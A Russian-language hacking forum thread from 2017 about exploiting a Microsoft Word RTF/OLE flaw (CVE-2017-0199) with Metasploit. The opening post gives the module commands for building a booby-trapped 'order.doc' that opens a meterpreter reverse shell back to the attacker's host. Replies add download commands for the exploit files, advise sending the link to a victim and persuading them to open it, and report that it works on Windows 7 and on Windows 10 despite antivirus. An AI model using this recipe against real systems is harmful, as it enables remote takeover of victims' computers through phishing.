HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.05.2017, 23:40
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Привет всем! В этой статье я хочу показать, как можно получить активную сессию meterpreter, на удаленном хосте (Windows 8.1., Windows 7, Windows Server 2008) используя скрипт python который генерирует .rtf-файл для атаки. Все необходимое включено в Metasploit Framework.



Этот модуль создает вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.

OLE— технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.

OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.

Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.

Эта ошибка была изначально замечена в октябре 2016 года. Модуль был создан путем обращения вспять общедоступного образца вредоносной программы.

Начнем:

> use exploit/windows/fileformat/office_word_hta

> set srvhost 192.168.0.106

> set payload windows/meterpreter/reverse_tcp

> set filename order.doc

> set lhost 192.168.0.106

> exploit




Выделенная ссылка, на скриншоте ниже должна быть доставлена целевой хост:



Переход по ней и открытие скачанного файла, откроет активную сессию meterpreter:



> sysinfo




На этом все, спасибо за внимание.
 
Ответить с цитированием

  #2  
Старый 12.05.2017, 20:36
Vertigo
Познавший АНТИЧАТ
Регистрация: 27.02.2017
Сообщений: 1,312
С нами: 4845950

Репутация: 0


По умолчанию

Цитата:

CVlad сказал(а):

какие версии офиса подвержены данной уязвимости?

Уязвимость выстрелила как зеро-дэй. Речь шла о всех версиях. Так прошёл год )) Ждали от Майкрософта обновления с патчами.
11.04.2017 они действительно вышли и большей частью для МО 2016,2013,2010 г.
Но всё равно подозрительная тишина в отношении успеха.
Возможно ,пока к исчерпывающим ответам не готовы компании на рынке ИБ.
Кроме того, этого же числа , поддержка Win Vista должна быть прекращена по планам.
И это для поддерживаемых ОС,либо озадаченых обновлением пакета безопасности для МО.
 
Ответить с цитированием

  #3  
Старый 12.05.2017, 22:05
XuliNam
Новичок
Регистрация: 04.03.2018
Сообщений: 2
С нами: 4313846

Репутация: 0
По умолчанию

Цитата:

Oksy сказал(а):

Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать. Не кидайте тапками, только начинаю знакомство с эксплойтами и метасплойтом

да никто не кидает тапки)) ссылку доставь в контакте или еще как нить и убеди, что емц необходимо посмотреть этот документ)) короче изучай соц инженерию )
 
Ответить с цитированием

  #4  
Старый 12.05.2017, 22:05
Vertigo
Познавший АНТИЧАТ
Регистрация: 27.02.2017
Сообщений: 1,312
С нами: 4845950

Репутация: 0


По умолчанию

Цитата:

Oksy сказал(а):

Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать.

Вам надо воспользоваться поиском по форуму,задать теги meterpreter , metasploit .
Очень много отличных статей вышло от наших известных авторов.Быстро изучить не получится,т.к инструмент
огромен по функционалу. Ссылка, как вариант , прилагается к письму и отсылается с рассчётом на прочтение.
 
Ответить с цитированием

  #5  
Старый 12.05.2017, 22:25
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

качнуть код - под хайд

https://packetstormsecurity.com/files/142281/office_word_hta.rb.txt

Но это не все, что бы не получить ошибку:
Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf

качаем:
wget https://raw.githubusercontent.com/n...CVE-2017-0199/data/exploits/cve-2017-0199.rtf

стартуем, пробуем =)

ТС - респект за оперативный топик =)
 
Ответить с цитированием

  #6  
Старый 12.05.2017, 22:36
XuliNam
Новичок
Регистрация: 04.03.2018
Сообщений: 2
С нами: 4313846

Репутация: 0
По умолчанию

Цитата:

ghostphisher сказал(а):

К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

качнуть код - под хайд

***Скрытый текст***

ТС - респект за оперативный топик =)

Cпс ты как всегда спасаешь Parrot OS
 
Ответить с цитированием

  #7  
Старый 12.05.2017, 23:12
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Все работает

win7 SP1 Эннтерпрайз
 
Ответить с цитированием

  #8  
Старый 13.05.2017, 01:06
XuliNam
Новичок
Регистрация: 04.03.2018
Сообщений: 2
С нами: 4313846

Репутация: 0
По умолчанию

отлично прошлось по виндовс 10 при работающем авасте )) но при скачивании гугл Хром ругаеться, что фаил может быть плохой и навредит компу))
[doublepost=1494623166,1494620336][/doublepost]добавлю ) после открытия файла на вин10 ) на панели висит непонятный значек, который напрягает и привлекает внимание)
 
Ответить с цитированием

  #9  
Старый 01.06.2017, 20:22
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Цитата:

jaguar сказал(а):

Failed to load module: exploit/windows/fileformat/office_word_hta
msf > и как загрузить модуль?

А версия metasploit какая?
 
Ответить с цитированием

  #10  
Старый 01.06.2017, 20:53
Vander
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами: 8170166

Репутация: 0
По умолчанию

Цитата:

jaguar сказал(а):

metasploit v4.12.22-dev
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post
+ -- --=[ 455 payloads - 39 encoders - 8 nops
+ -- --=[ Free Metasploit Pro trial:

Стоит проапдейтить систему,
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.